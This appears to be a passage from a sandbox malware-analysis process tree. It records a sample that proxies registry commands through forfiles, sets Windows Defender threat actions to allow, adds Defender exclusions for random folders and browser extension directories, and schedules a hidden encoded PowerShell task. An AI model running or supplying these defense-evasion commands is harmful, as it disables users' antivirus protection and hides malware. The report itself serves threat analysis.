                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                      5⤵
                                                        PID:1980
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                    3⤵
                                                    • Indirect Command Execution
                                                    PID:1752
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2924
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                        5⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4864
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                    3⤵
                                                    • Indirect Command Execution
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2356
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                      4⤵
                                                        PID:5908
                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                          5⤵
                                                            PID:5640
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                        3⤵
                                                        • Indirect Command Execution
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5944
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                          4⤵
                                                            PID:2380
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                              5⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Drops file in System32 directory
                                                              • System Location Discovery: System Language Discovery
                                                              • Modifies data under HKEY_USERS
                                                              PID:2280
                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                6⤵
                                                                  PID:3688
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                          2⤵
                                                          • Drops file in System32 directory
                                                          • System Location Discovery: System Language Discovery
                                                          • Modifies data under HKEY_USERS
                                                          PID:4872
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:4368
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                4⤵
                                                                  PID:5156
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                  PID:3816
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                    PID:3936
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                      PID:3964
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                        PID:4892
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5904
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5440
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4992
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:936
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:6112
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                          3⤵
                                                                            PID:5204
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:4028
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:5496
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:5128
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:5492
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:6068
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3308
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                              3⤵
                                                                                PID:5856
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                3⤵
                                                                                  PID:2924
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:5224
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                  3⤵
                                                                                    PID:4588
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                    3⤵
                                                                                      PID:5576
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                      3⤵
                                                                                        PID:1768
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                        3⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:5244
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                        3⤵
                                                                                          PID:2020
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                            PID:1240
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                            3⤵
                                                                                              PID:3028
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                              3⤵
                                                                                                PID:796
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IfTYFdYohdhRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IfTYFdYohdhRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cBfgrRECHDYJtCCxauR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cBfgrRECHDYJtCCxauR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mgvwDscPBpUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mgvwDscPBpUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sozrmRSxWUyU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sozrmRSxWUyU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xFHhRZnoU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xFHhRZnoU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\asFrGLUBkJEUSBVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\asFrGLUBkJEUSBVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gXItsKzEGiJHAsry\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gXItsKzEGiJHAsry\" /t REG_DWORD /d 0 /reg:64;"
                                                                                              2⤵
                                                                                              • Drops file in System32 directory
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:424
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IfTYFdYohdhRC" /t REG_DWORD /d 0 /reg:32
                                                                                                3⤵
                                                                                                  PID:6140
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IfTYFdYohdhRC" /t REG_DWORD /d 0 /reg:32
                                                                                                    4⤵
                                                                                                      PID:5028
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IfTYFdYohdhRC" /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:5552
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cBfgrRECHDYJtCCxauR" /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:5092
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cBfgrRECHDYJtCCxauR" /t REG_DWORD /d 0 /reg:64
                                                                                                      3⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4160
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgvwDscPBpUn" /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:1008
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgvwDscPBpUn" /t REG_DWORD /d 0 /reg:64
                                                                                                      3⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:6040
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sozrmRSxWUyU2" /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4780
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sozrmRSxWUyU2" /t REG_DWORD /d 0 /reg:64
                                                                                                      3⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4688
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xFHhRZnoU" /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:4392
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xFHhRZnoU" /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:6004
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\asFrGLUBkJEUSBVB /t REG_DWORD /d 0 /reg:32
                                                                                                        3⤵
                                                                                                          PID:1176
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\asFrGLUBkJEUSBVB /t REG_DWORD /d 0 /reg:64
                                                                                                          3⤵
                                                                                                            PID:4840
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                            3⤵
                                                                                                              PID:2112
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                              3⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:1964
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                              3⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2540
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                              3⤵
                                                                                                                PID:2548
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa /t REG_DWORD /d 0 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:1884
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa /t REG_DWORD /d 0 /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:1368
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gXItsKzEGiJHAsry /t REG_DWORD /d 0 /reg:32
                                                                                                                    3⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:4972
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gXItsKzEGiJHAsry /t REG_DWORD /d 0 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:2952
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /CREATE /TN "gnQdJQNcu" /SC once /ST 00:38:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                    2⤵
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:2456
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
